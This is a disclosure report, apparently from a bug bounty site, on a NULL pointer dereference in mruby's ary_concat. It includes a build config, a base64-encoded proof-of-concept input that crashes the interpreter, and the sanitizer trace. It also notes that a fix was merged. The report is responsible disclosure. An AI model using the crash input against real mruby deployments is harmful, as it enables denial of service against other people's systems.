NULL Pointer Dereference in mruby/mruby

Valid

Reported on

Feb 14th 2022


Description

There is a NULL Pointer Dereference in ary_concat (array.c:301). This bug has been found on mruby lastest commit (hash ecb28f4bf463483cf914c799d086b0cfff997aee) on Ubuntu 20.04 for x86_64/amd64.

Proof of Concept

The crash is not reproducible in a debug build, so a release build config must be used to reproduce it:

1- Clone repo and build with ASAN (but in non-debug mode) using MRUBY_CONFIG=build_config/poc_config.rb rake. With poc_config.rb being:

MRuby::Build.new do |conf|
  conf.toolchain :clang
  # include the GEM box
  conf.gembox 'full-core'

  conf.enable_sanitizer "address,undefined"
  conf.enable_bintest
  conf.enable_test
end

2- Use mruby to execute the poc (it is base64-encoded since it contains unprintable characters):

$ echo -ne 'R0M6OmNsYXNzLm5ld3tzdXBlciBzdXBlciBzdXBlcigmKQpiPTAsKuk9MH0=' | base64 -d > poc
$ ~/mruby/build/host/bin/mruby min
/home/faraday/mruby/src/array.c:301:7: runtime error: member access within misaligned address 0x000000000001 for type 'struct RArray', which requires 8 byte alignment
0x000000000001: note: pointer points here
<memory cannot be printed>
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior /home/faraday/mruby/src/array.c:301:7 in 
AddressSanitizer:DEADLYSIGNAL
=================================================================
==54835==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000012 (pc 0x00000055a515 bp 0x7ffe088eb5d0 sp 0x7ffe088ea940 T0)
==54835==The signal is caused by a READ memory access.
==54835==Hint: address points to the zero page.
    #0 0x55a515 in ary_concat /home/faraday/mruby/src/array.c:301:7
    #1 0x55a515 in mrb_ary_concat /home/faraday/mruby/src/array.c:324:3
    #2 0x5ae1c9 in mrb_vm_exec /home/faraday/mruby/src/vm.c:2622:9
    #3 0x59ad77 in mrb_vm_run /home/faraday/mruby/src/vm.c:1128:12
    #4 0x53f5b4 in mrb_mod_initialize /home/faraday/mruby/src/class.c:1648:5
    #5 0x5bc37b in mrb_vm_exec /home/faraday/mruby/src/vm.c:1633:18
    #6 0x59ad77 in mrb_vm_run /home/faraday/mruby/src/vm.c:1128:12
    #7 0x692370 in mrb_load_exec /home/faraday/mruby/mrbgems/mruby-compiler/core/parse.y:6883:7
    #8 0x69341f in mrb_load_detect_file_cxt /home/faraday/mruby/mrbgems/mruby-compiler/core/parse.y:6926:12
    #9 0x4c69ee in main /home/faraday/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:357:11
    #10 0x7f6682c1d0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #11 0x41c83d in _start (/home/faraday/mruby/build/host/bin/mruby+0x41c83d)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/faraday/mruby/src/array.c:301:7 in ary_concat
==54835==ABORTING

Impact

This vulnerability is capable of making the mruby interpreter crash, thus affecting the availability of the system.

Acknowledgements

This bug was found by Octavio Gianatiempo (ogianatiempo@faradaysec.com) and Octavio Galland (ogalland@faradaysec.com) from Faraday Research Team.

We are processing your report and will contact the mruby team within 24 hours. 3 months ago
We have contacted a member of the mruby team and are waiting to hear back 3 months ago
Yukihiro "Matz" Matsumoto validated this vulnerability 3 months ago
octaviogalland has been awarded the disclosure bounty
The fix bounty is now up for grabs
Yukihiro "Matz" Matsumoto confirmed that a fix has been merged on 44f591 3 months ago
Yukihiro "Matz" Matsumoto has been awarded the fix bounty
to join this conversation